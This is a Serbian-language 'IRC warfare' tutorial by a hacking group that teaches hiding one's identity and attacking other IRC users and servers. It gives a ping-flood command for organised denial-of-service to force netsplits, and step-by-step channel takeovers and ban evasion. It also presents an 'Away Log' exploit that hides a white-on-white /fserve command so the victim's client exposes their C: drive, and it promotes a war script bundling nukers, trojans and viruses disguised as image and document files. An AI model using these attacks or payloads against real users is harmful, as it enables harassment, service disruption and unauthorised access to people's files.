IRC - H4cK tEam

IRC RATOVI

Sta je IRC?]

IRC je skracenica od "Internet Realy Chat" sto bi na 'naskem' znacilo razgovaranje na internetu u realnom vremenu. Prvi put IRC sepojavio u Finskoj, a zatim se prosirio na jos 60 zemalja sirom sveta. On je dizajniran kao program koji ce dozvoliti 'razgovaranje' ljudi na velikim daljinama. IRC je visekorisnicki chat (razgovorni) sistem, gde se ljudi srecu u takozvanim kanalima - channels (to su virtualna mesta - sobe koja obicno imaju odredjenu temu razgovora) kako bi razgovarali u grupama ili privatno. Broj korisnika na IRC-u nije ogranicen kao i broj kanala koji moze biti otvoren na njemu.

[Objasnjenje rada IRC-a]

Sve komunikacije se na Internetu odvijaju preko servera, osim DCC-a protokola (Direct Client Communication). Kada se konektujete na server vi mu saljete 2 komande: NICK i USER. Ovo su komande koje vas identifikuju na IRC-u. NICK je skracenica od NICKNAME sto znaci nadimak, a user je vase pravo ime. Evo i primera (formata komande):

NICK VasNadimak - podesava vas nadimak;
npr.
NICK ReNZor

USER KorisnickoIme host server :Vase Pravo Ime >> ovo kao sto vidite podesava vase korisnicko ime, host, server na koji ste konektovani i vase pravo ime;
npr.
USER Zika bg-123.ptt.yu irc.serbiancafe.ws :Zika Zikic

Naravno svi ovi podaci se mogu i lazirati, tj. zelim da kazem da ne morate staviti vase pravo ime mozete staviti sta god zelite, ali ukoliko mislite da ovako mozete da lazirate i IP adresu - varate se.

[Zasto su otpoceti IRC ratovi?]

IRC ratovi ili IRC Warfare su otpoceti na starom serveru EFNet. Naime, na ovom serveru nije bilo moguce kao na danasnjim serverima registrovanje nadimaka (nick-a). Kada bi se neko konektovao na IRC i video da neko drugi koristi njegov nadimak taj bi smisljao razne nacine kako da udalji tog korisnika sa IRC-a i povrati svoj nick. Korisnici su isprobavali razne stvari jedni na drugima i tako su nastali IRC Ratovi. Danas neki korisnici zapocinju IRC Ratove 'samo iz zabave', ili da preuzmu (TakeOver) kanal koji im se ne svidja ili da udalje nekog korisnika sa IRC-a.

[Sta ostali znaju o meni?]

Ovo je prva bitna stvar o kojoj morate da vodite racuna kada su u pitanju IRC ratovi. Pre nego sto bilo sta otpocnete morate znati sta ostali korisnici mogu da saznaju o vama, a sta vi o njima. Kao prvo, ukoliko niste konektovani na IRC preko proxy-a, wingate-a ili BNC-a (o tome cemo kasnije), ostali korisnici mogu saznati vasu IP adresu. Ukoliko ste edan od onih koji misle "OK... znaju moju IP adresu... koga boli uvo?" znajte da gresite. Zapravo iz jedne IP adrese moze se saznati mnogo toga. Pogledajmo za primer sledeci host (prevedena IP adresa):

bg1-017.ptt.yu
|      |     |    |
|      |     |   +- Odavde vidite odakle ISP i sama osoba (YU - Jugoslavija)
|      |     |
|      |    +- Ovo vam govori da je ISP (Internet Service Provider) osobe PTT
|      |
|     +- Ovaj broj je oznaka (broj) modema u ISP-u osobe
|
+- Ovo vam govori mesto iz kog je osoba (BG oznacava Beograd)

Opaaaaa... ovo je vec dosta stvari. Dakle iz prevedene IP adrese tj. hosta moze se saznati dosta vaznih stvari:
1) ISP osobe
2) Grad
3) Drzava
Sada ukoliko vi znate neciji ISP mozete poslati e-mail na [email protected] - u nasem slucaju [email protected] i da se pozalite na korisnika i prijavite njegov IP i sta vam je uradio (npr. ukoliko je izvrsio neki napad na vas), a ISP ce uraditi ostalo tj. verovatno ce ugasiti njegov nalog.

To je ono sto ostali korisnici mogu saznati o vama. Ali nekada ce te umesto hosta videti samo brojeve poput 123.45.67.89 (ovo je samo primer), ali ne i host kao u prethodnom primeru. To je IP adresa i ona se moze veoma jednostavno prevesti u host. Za to vam je potreban alat koji se zove NSLookup koji dolazi uz sve Unix sisteme. Ukoliko ga vi nemate potrazite ga na netu. Potrebno je samo da unesete IP adresu i NSLookup ce je prevesti u host. Takodje mozete pogledati i DNS server tako sto ce te izvesti WHOIS te osobe. Potrebno je da ukucate /whois nickosobe i tada ce te dobiti nesto poput ovoga:

/whois JoNk3
:irc.serbiancafe.ws 311 ReNZor JoNk3 ~JoNk3 bg1-017.ptt.yu * :Outlaw Crew
:irc.serbiancafe.ws 312 ReNZor JoNk3 irc2.serbiancafe.ws :Serbian Cafe
:irc.serbiancafe.ws 317 ReNZor JoNk3 9 932030074 :seconds idle, signon time
:irc.serbiancafe.ws 318 ReNZor JoNk3 :End of /WHOIS list.

U redu sada cemo ici iz reda u red i objasnjavati sta se moze saznati odavde.

1) U prvom redu dobro pogledajte, videcete dosta podataka:

~JoNk3 bg1-017.ptt.yu * :Outlaw Crew
|            |      |    |    |              |
|            |      |    |    |             +- Ovo bi trebalo da bude pravo ime korisnika, ali kao sto
|            |      |    |    |                 vidite ono moze da se lazira (tj. da se unese lazno)
|            |      |    |    |
|            |      |    |   +- Drzava (mesto) iz koga je ISP i sam korisnik
|            |      |    |
|            |      |   +- Internet Service Provider korisnika
|            |      |
|            |    +- Broj modema u ISP-u korisnika
|            |
|           +- Mesto - Grad iz koga je ISP, a i sam korisnik
|
+- Username (korisnicko ime) koji obicno moze da se lazira. Ukoliko je tacno tj nije lazirano onda znate i e-mail korisnika npr. [email protected]

2) Sledeci red nam govori server na koji je konektovan korisnik u nasem slucaju to je irc2.serbiancafe.ws i komentar servera koju postavlja admin.
3) Treci rad nam daje informaciju o tome koliko je sekundi korisnik prisutan na IRC-u (9) i kada se korisnik konektovao na IRC 932030074.
4) I zadnja linija govori da je to kraj WHOIS liste.

Takodje, ukoliko neko ima vasu IP adresu korisnik moze izvrsiti neki od mnogobrojnih LAMERSKIH DoS (Denial of Service) napad koji ce obicno prekinuti vasu konekciju sa serverom. Za vise informacija o DoS napadima procitajte tutorial "Sve o DoS napadima" sa naseg sajta.

[Kako sakriti vas identitet na IRC-u]

Nakon sto ste naucili sta se sve o vama moze saznati i sta vi sve mozete saznati o njima, vreme je da naucite i kako da sakrijete informacije o vama. Kao prvo i najprostije ne smete u vase IRC klijentu staviti vase pravo ime i e-mail. Uvek izmislite nesto koje nece imati nikakve veze sa vama na primer Zika Zikic i kao e-mai [email protected] Ovime ste uspeli da zavatate trag ukoliko neko uradi FINGER CTCP zahtev. Ovim zahtevom ce korisnik dobiti vase pravo ime i e-mail ukoliko ste ih tacno uneli. Ovaj ctcp zahtev se dobija ako se unese:

/CTCP Finger NickKorisnika

Takodje postoje i VERSION (daje verziju irc klijenta koji koristite), TIME (govori trenutno vreme kod vas), PING (govori ukoliko ste u lag-u) CTCP zahtevi koji takodje mogu dosta da kazu o vama. Sve ovo morate lazirati. Najjednostavnije je da koristite neku od skripti (addona) za vas irc klijent koji ce falsirati ove podatke. Ukoliko koristite mIRC onda mozete da iskopirate sledecu skriptu u vasu REMOTE skriptu:

###### SECI OVDE ######

; OVIME CE TE LAZIRATI VERZIJU MIRC-A I UKOLIKO BUDE IZVRSEN CTCP ZAHTEV PISACE DA VI KORISTITE mIRC v0.0.0.0.1 ILI MOZETE DA UNESETE NESTO DRUGO (BUDITE KREATIVNI)
ctcp 1:VERSION:{
    .notice $me Recieved CTCP VERSION from $nick $+ / $+ $site
    ctcpreply $nick VERSION mIRC v0.0.0.0.1 | halt
}
; OVIME CE TE LAZIRATI VREME I NA CTCP TIME ZAHTEV IZGLEDACE KAO DA STE DOSLI IZ BUDUCNOSTI TJ. IZ 2098 GODINE
ctcp 1:TIME:{
    .notice $me Recieved CTCP TIME from $nick $+ / $+ $site
    ctcpreply $nick TIME Tue Jun 12 22:23:17 2098 | halt
}
; MASKIRATE VASE PRAVO IME I E-MAIL
ctcp 1:FINGER:{
    .notice $me Recieved CTCP FINGER from $nick $+ / $+ $site
    ctcpreply $nick FINGER Zika Zikic [email protected] | halt
}
; MASKIRATE BRZINU VASE KONEKCIJE TAKO DA CE IZGLEDATI KAO DA IMATE NEBESKI DOBRU KONEKCIJU
ctcp 1:PING:{
    .notice $me Recieved CTCP PING from $nick $+ / $+ $site
    ctcpreply $nick PING 987263478667.12377 | halt
}

###### SECI OVDE ######

Zasto je sve ovo vazno? Pa evo primera: Ukoliko ne lazirate verziju vaseg mIRC-a napadac moze veoma jednostavno ovim ctcp zahtevom da otkrije verziju vaseg mIRC-a, a ukoliko zna koja je verzija vaseg mIRCa lakse ce da zna ukoliko vasa verzija ima neki bug koji napadac moze da iskoristi. Ili, ukoliko ne maskirate vreme, napadac moze znati iz koje ste vremenske zone i time dobiti doznanja iz koje ste drzave. Ili, ukoliko ne lazirate brzinu vase konekcije, napadac moze videti ukoliko vam je slaba konekcija ili ukoliko se nalazite u lagu i moze otpoceti neki od floodova i time srusiti vasu konekciju sa serverom.

Ovo je samo pocetak sakrivanja vaseg identiteta. Dakle da se preslisamo: sakrili smo nase pravo ime, e-mail, vreme, brzinu konekcije, i verziju IRC klijenta, ali i dalje je korisnicima dostupna nasa IP adresa i HOST, a ukoliko imaju nasu IP adresu mogu veoma lako da otkriju sve.

Za skrivanje IP adrese nema lakog nacina. Zapravo nasa IP adresa se moze sakriti samo uz pomocu nekog PROXY SERVERA, WINGATE SERVERA, ili BNC SERVERA. Pocecu sa objasnjavanjem jednog po jednog. Krenucemo sa proxy serverima. Proxy serveri dozvoljavaju da se preko njih konektujemo na irc server i time nam dopustaju da koristimo ip adresu samog proxy servera. Proxy serveri se mogu naci bilo gde na netu. Probajte da ih nadjete uz pomoc Google-a ili uz pomoc Astalaviste time sto ce te kao rec za pretragu uneti PROXY SERVER. Lako se konfigurisu sa mIRC-om i ostalim IRC klijentima. Evo objasnjenja konkretnog konfigurisnja mIRC-a da radi preko proxy servera:

1. Idite na FILE > OPTIONS;
2. Izaberite FIREWALL kategoriju;
3. Cekirajte USE FIREWALL;
4. Izaberite PROXY protokol;
5. U HOSTNAME unesite IP adresu ili host proxy servera;
6. UserID i PASSWORD nemojte da dirate;
7. U port unesite port proxy servera;
8. Kliknite na OK i konektujte se na irc server.

O WinGate-u vam necu pricati jer smatram da je on velika glupost, vec sam vam samo spomenuo cisto da znate. Konfigurise se isto kao i proxy, a za pronalazenje WinGate servera mozete koristiti alat koji se zove WinGate Scanner, koji ce skenirati celu mrezu za WinGate serverima.

Velika mana proxy servera i wingatea u upotrebi sa irc-om je ta sto dosta danasnjih irc servera ne dozvoljavaju njihovo koriscenje. Tacnije, danasnji serveri imaju patcheve koji otkriju konkciju preko proxya ili wingatea i ip adresu stave u K-Line tako da ircu nije moguce pristupiti. Najbolji nacin za skrivanje IP adresa na ircu je svakako BNC.

BNC je skracenica od BOUNCER sto znaci odskok. Bas poput proxy servera i wingate-a BNC je server koji nam omogucava potpuno sakrivanje IP adresa, koje sam IRC server ne moze da otkrije. Neki BNC serveri imaju takozvani virtualni host (vHost) koji omogucava da sami izmislimo nas host, sto je veoma interesantno. Zapravo, ovime mozete namestiti vas host kao I.LOST.MY.IP.ADDRESS ili nesto slicno ovome. MOCNO ZAR NE? Evo i primera kako koristiti BNC sa mircom.
Recimo, na primer, da postoji BNC server na adresi bnc.shell.com i na portu 1234. Prvo trebamo da se konektujemo na taj server kucajuci:
/server bnc.shell.com 1234

Ovime smo se konektovali na BNC server i ispisace nam se poruka da je potrebno unesti password:
-BNC- Please type your password via /quote pass

AuUuUuuuu. Zaboravio sam da vam kazem da je za BNC potreban i password. Hehe. Ukoliko znate password necete imati problema. potrebno je samo da ukucate:
/quote pass

Ali, ukoliko neznate password to moze biti problem. Onda ce te morati da pitate onog ko vam je rekao za BNC server za password, ili u svako doba mozete da uhakujete u server ;) Ali, ovo nije tutorial o hakovanju servera, vec o IRC ratovima... Salu na stranu, ukoliko se potrudite mozete na netu naci i listu BNC servera sa passwordima. Mozda ce vam tesko biti da nadjete, ali pokusajte uz pomoc Google ili astalaviste da trazite BOUNCER, BNC, psyBNC, mozda vam se i posreci. Ahm... naravno ja znam nekoliko servera, ali cuvam ih za sebe HeHeHe.
OK, dakle, nabavili ste password, konektovali ste, uneli password se komandom /quote pass i sta sada? Sada je potrebno da podesite vHost. To mozete da uradite komandom:
/quote vip lazno.ime.vaseg.hosta

ovo moze biti bilo sta npr /quote vip JA.NEMAM.IP.ADRESU ili sta god vam drugo padne na pamet. Mada ja preporucujem da koristite neki host koji postoji, ali koji nije vas ISP kako bi dodatno zakomplikovali stvari. Npr. ukoliko je vama Isp - PTT.YU vi kao host stavite BEOTEL.NET ili nesto slicno.
Sada samo ostaje da se konektujete na irc server komandom:
/conn irc.server.com
npr.
/conn irc.serbiancafe.ws

i to je to. BNC je odlicna stvar i radi na svakom IRC serveru tj. ni jedan IRC server ga ne moze detektovati, tako da necete biti banovani zbog njegovog koriscenja.
Ukoliko ste uradili sva podesavanja i ukoliko ste se konektovali preko nekog BNC servera, ne postoji nikakva sansa da bude otkriven vas identitet na IRCu.

[Banovi i kako ih zaobici?]

Verovatno se i vama desilo da budete banovani tj. udaljeni sa kanala na neko vreme kada ste opsovali na kanalu, ili izvrsili neku nedozvoljenu akciju. Da bi ste zaobisli ban morate znati o kom je banu rec. Naime postoje vise vrsta banova:

1. nick!*@* - Ovaj ban oznacava da je banovan vas nick tj. nadimak, jednostavno ga mozete izbeci promenom vaseg nadimka.
2. *!user@* - Banovan je vas UserID tj. Korisnicki ID. Ovaj ban mozete zaobici promenom UserID-a. Mozete ga promeniti ako idete na FILE > OPTIONS, kliknete na CONNECT > IdentD i unesete novi UserID.
3. *!*@host - Oznacava banovanje vaseg host-a/ip adrese. Potrebno je da se konektujete preko drugog proxya ili da promenite vHost BNC-a.
4. nick!user@host - Ovo je najkomplikovaniji ban. Da bi ste ga izbegli potrebno je da promenite vas nick, UserID, kao i proxy server ili vHOST BNC-a.

Moze se napraviti i mIRC skript koji ce automatski izvrsiti identifikovanje i zaobilazenje bana, pa cak i ukoliko je rec o user!nick@host banu koriscenjem BNC-a. Ovakav skript mozete naci u ProHack Scriptu v2.6 koji konstruisan od strane Outlaw Crew-a.

[Udaljavanje korisnika sa IRC-a]

Najlaksi nacin izbacivanja korisnika sa irc-a je kick/ban... naravno ukoliko ste OP (operater), ali ukoliko nemate OP status, onda morate uraditi nesto drugo. Cak i ukoliko niste OP mozete na lak, ali veoma LAMERSKI nacin da izbacite korisnika sa IRC-a. Ovo se vrsi takozvanim DoS napadom. Ne ovde nije rec o MS-DOSu ovde je rec o Denial of Service-u. Zapravo to je napad pri cemu se konekcija izmedju klijenta i servera prekida i prekidanjem te konekcije korisnik se udaljava sa irc-a. Postoje mnogo DoS programa popularno nazvanih Nukeri. Veoma je jednostavno koristiti efektivne nukere i o tome vam necu pricati, jer sve se svodi na klik misa.
Evo i malo lepseg nacina za ovo. Za ovo ce vam biti potreban neki od mnogobrojnih floodera i klonera koje mozete naci na netu (ukoliko vam je potreban obratite se na moj e-mail). Potrebno je samo da ucitate nekoliko klona oko 6 ce izvrsiti posao i da napadnete korisnika nekim MSG floodom. Ovim ce njegova konekcija sa irc serverom biti prekinuta, a na kanalima ce izaci poruka.
*** Quits: KorisNick (Excess Flood)

Postoji i dosta komplikovaniji nacin za napad na korisnika. Morate znati koju verziju mIRCa koristi kao i koji OS (operativni sistem) i da pronadjete odredjene bug-ove (propuste) u njemu i da ga napadnete. Postoje razne vrste napada.

[Mogu li biti uhvacen i ocu li?]

Ovo zavisi od toga sta nameravate da uradite ili sta ste vec uradili. Ukoliko npr. zelite da preuzmete neki kanal tj. da izvrsite TakeOver, a da pre toga niste sakrili svoj identitet, sigurno ce te biti uhvaceni i verovatno udaljeni sa kanala i irc-a, ali ukoliko koristite BNC, tome nema sanse. Ili, ukoliko nukujete nekoga, a pre toga niste sakrili vasu IP adresu, vasa zrtva moze iz vase IP adrese izvuci vas HOST i poslati e-mail na [email protected] i pozaliti se na to sto ste mu uradili, a vas ISP ce vam ugasiti nalog.
Ukoliko izvrsite Netsplit (sledece poglavlje), necete biti uhvaceni i nista vam se nece desiti jer niste izveli nista ne dozvoljeno.

[Sta je Netsplit i kako mi moze pomoci?]

Kao sto i sama rec kaze netsplit je cepanje-razdvajanje mreze. Naime, velike IRC mreze sadrze razlicite servere. Kada se izvrsi netsplit dva servera link koji spaja ove servere biva srusen kao posledica lag-a. Svi korisnici koji su bili konektovani na ovaj server bice razdvojeni jedni pd drugih dokle god netsplit traje. Tada se kanali polako prazne i kanal se zatvara. Ukoliko udjete u kanal koji je ostao prazan usled netsplita, ili ukoliko ste u kanalu pa uradite cycle (ulaz-izlaz) velike su sanse da vi postanete OP tog kanala, sem ukoliko kanal nema chanserv.
Veoma je tesko da sami izvrsite netsplit na nekom serveru. Mozda je najjednostavniji nacin za to 'organizovani napad'. Potrebno je da vise korisnika istovremeno zapocnu PING flood na server koji se napada i to sa veoma brze konekcije, sa mogucstvom da je server vec u lag-u. Ping flood se vrsi iz MS-DOSa. Otvorite DOS prozor, i unesite:
ping -l 2800 -t -w 2000 ip.ili.host.servera

Ukoliko vise korisnika zapocnu ovaj ping flood na irc server zasigurno je da ce doci do netsplita. Jednom kada dodje do netjoina (ponovnog ulaska svih korisnika), dobro je da imate ratnu skriptu koja ce DeOP-ovati sve korisnike i time spreciti da vas izbace.

[Preuzimanje kanala - TakeOver]

TakeOver se vrsi radi preuzimanja kanala nekog korisnika i sprecavanja njegovog ponovnog ulaska u taj kanal. Kao prvo potrebno je da dobijete OP. To se moze postici na vise nacina.
1. Preko Netsplita (mozda ce trebati dosta vremena);
2. Ukoliko trazite od nekog operatora da vam da OP (vredi pokusati - mozda i uspe);
3. Ukoliko pokrenete bot-a sa nekog sheel accounta i stavite ga da bude 24 casa 7 dana u nedelji prisutan na IRC-u, i zatim pitati OPove da daju botu OP status. Verovatno ce pristati (zato sto je stalno prisutan na ircu), a zatim botom dajte sebi OP.

Znajte da bez OP statusa ne mozete preuzeti kanal. Ukoliko ste dobili OP evo sta trebate da uradite da bi ste preuzeli kanal:
1. Prvo izvrsite masovni Deop kako ne bi mogli da te izbace ili banuju. Postoje mnogo skripti koje ovo mogu da izvedu za vas;
2. Zatim stavite ban na *!*@*;
3. Izvedite masovni kick kako bi izbacili sve korisnike sa kanala (takodje sa skriptom);
4. Ukucajte /set #imekanala mode +smilk 1 1;
5. Ovime ste preuzeli kanal.

[Ratne skripte - War Scripts]

Ratne skripte su zapravo skripte za odredjene irc klijente poput mIRC-a, BitchX-a, XChat-a itd. koje imaju dodatne opcije kao sto su Masovne funkcije, Takeover opciju, nukere, dos, floodere, klonere, a ponekad i viruse, trojane, exploite... Evo nekih skripti koje vam savetujem da potrazite na netu:

7th Sphere Script
TRiBE (t7)
Peace and Protection 4.0
Wang Script 3.5 pro
WarMaster v6.0
WarPoWer Script

Od nasih domacih ratnih mIRC skripti neznam nabrojati ni jednu... mozda zato sto i ne postoji... mislim postoje ali su veoma lose i pruzaju malo funkcija. Nasa ekipa - Outlaw Craw je dizajnirala savrsenu IRC War skriptu koja sadrzi sve funkcije koje su potrebne za napad i odbranu preko irca. Ovo je sadrzaj skripte svrstan u kategorije odbrana i napad:

ODBRANA: Lazni CTCP Reply, BNC, ProxyRedirect, Flood zastita, Netsplit Detektor, Virus skener, Kick/Ban/Deop zastita, kanal zastita, NukeNabber, klon detektor...

NAPAD: Nekoliko efektivnih nukera, mailbomber, kloner, dosta floodera, exploiti, virusi sakriveni u *.jpg *.txt *.doc *.exe formatu, dva razlicita trojana, port skener, i jos mnogo toga...

IRC EXPLOITSNapomena: Zelim da istaknem da je ovaj tutorial namenjen samo u edukativne svrhe i da autor ovog teksta nije odgovoran za bilo kakvu stetu koju napravite primenom ovih informacija.

[Kanal #2,000 exploit]

Ukoliko se nalazite na nekom od irc servera i udjete u kanal #2,000 bicete izbaceni iz svih kanala u kojima se trenutno nalazite. Zapravo, ne stvarno izbaceni, vec ce liciti kao da ste sami napustili sve kanale. Kao da ste ukucali /part u svim kanalima u kojima se nalazite. Sto je ovo vazno? Pa, evo vam nekoliko stvari koje mozete uraditi sa ovim glupim bagom:

1. Pretpostavimo da na ircu postoji bot koga zelite da izbacite iz odredjenog kanala. Izbacicete ga bez problema, samo ga pozovite da udje u kanal #2,000.
2. Neko koga mrzite je dobio OP na nekom kanalu. Ukoliko bih on izasao, pa zatim ponovo usao u isti kanal izgubio bih svoj OP. To mozete vrlo jednostavno da iskoristite: pozovite ga u kanal: #2,000 i on ce automatski napustiti kanal u kome je imao OP. Sledeci put kad udje nece imati OP.
3. Ukoliko neko poseduje kanal, a nije ga reagistrovao i koji bi vi zeleli da preuzmete, mozete ga samo pozvati u kanal #2,000 i bice izbacen iz svih kanala. Sada samo registrujte kanal koji ste zeleli da mu preuzmete i vi ste sada vlasnik.
4. Ukoliko neko ima ukljucen "auto join on invite" potrebno je samo da ga pozovete (invite) na kanal i bice izbacen iz svih kanala na kojima se trenutno nalazi.
5. Mozete i sami smisliti neke nacine na koji ce te iskoristiti ovaj bag...

Potrebno je da kazem, da ovaj bag ne radi samo na pozivu u kanal #2,000. Mozete takodje koristiti i #2,100, #3,000, #4,000 itd... itd... uopste nije bitno.

Napominjem da na nekim IRC serverima ovaj trik nece da uspe, jer server kreira #2 kanal umesto #2,000 tj. brise sve nakon zareza.

[Away Log exploit]

Rec je o veoma jednostavnom i efikasnom nacinu da upadnete u neciji racunar na irc-u. Kako? Ovaj trik se radi kada je zrtva odsutna (away) i kada joj je LOG ukljucen. To znaci da ce sve poruke koje posaljete biti snimljene. Kada vidite da je zrtva away kao poruku joj posaljite sledeci red:

Heejjjj!!! 0,0| /fserve VASNICK 10 c:

Poruka ce se, kada je unesete, videti samo kao: Heejjjj!!!, a ostatak se nece videti, zato sto su i slova i pozadina bele boje. Sta sada? Nista... samo cekate i kada se zrtva vrati nazad (kada skine away opciju) komanda /fserve VASNICK 10 c: ce se automatski pokrenuti i vama ce se pojaviti prozor na kome ce pisati da zrtva zeli da chatuje sa vam. Kliknite na YES i Fserv prozor ce se pojaviti i dozvoliti vam pristup zrtvinom HARD DRIVE-u C:! Jedina je mana sto nista necete moci da brisete sa zrtvinog drajva vec samo da pretrazujete njegov drajv i da kopirate kod vas. FSERV komande mozete dobiti ukoliko ukucate Help.

[Pronalazenje IP adrese]

Ukoliko ste ikada bili na serverima poput irc.krstarica.com sigurno ste videli da se IP adresa ne moze pronaci komandom /dns NICK. Na ovakvim serverima skoro da je nemoguce pronaci IP adresu drugog korisnika. Ali ponavljam SKORO. IP adresu nekog korisnika na ovakvim serverima mozemo pronaci, ako ovom korisniku posaljemo neki fajl preko DCC-a i pritom u MS-DOSu unesemo komandu:

c:\windows\> netstat -n

Ovime ce te dobiti listu svih IP adresa i hostova na koji ste konektovani. Verovatno ce na listi biti IP adresa irc servera i naravno IP adresa vase zrtve. Potrebno je samo da istovremeno sa DCC-om pokrenete i netstat. Jedina mana ovoga je to sto ce i zrtva dobiti vasu IP adresu nakon sto izvrsite DCC Send, ali to je cena koju morate da platite. Ovaj trik vazi i za ICQ.

[Netsplit]

Netsplit je veoma komplikovano izvrsiti na danasnjim irc serverima, i mozda je jedini nacin da izvrsite netsplit na odredjenom serveru organizovani ping flud sa djavolski dobre konekcije. Dakle, potrebno je da vise korisnika u isto vreme (ne bas iste sekunde) ukucaju u MS-DOS Promptu:

c:\> ping -l 2800 -t -w 2000 irc.sdresaservera.com

Gde je irc.adresaservera.com host ili ip adresa ili host odredjenog irc servera (npr. irc.serbiancafe.com). Kada zapocnete ping flud, server ce ubrzo ostati u lag-u i doci ce do netsplita.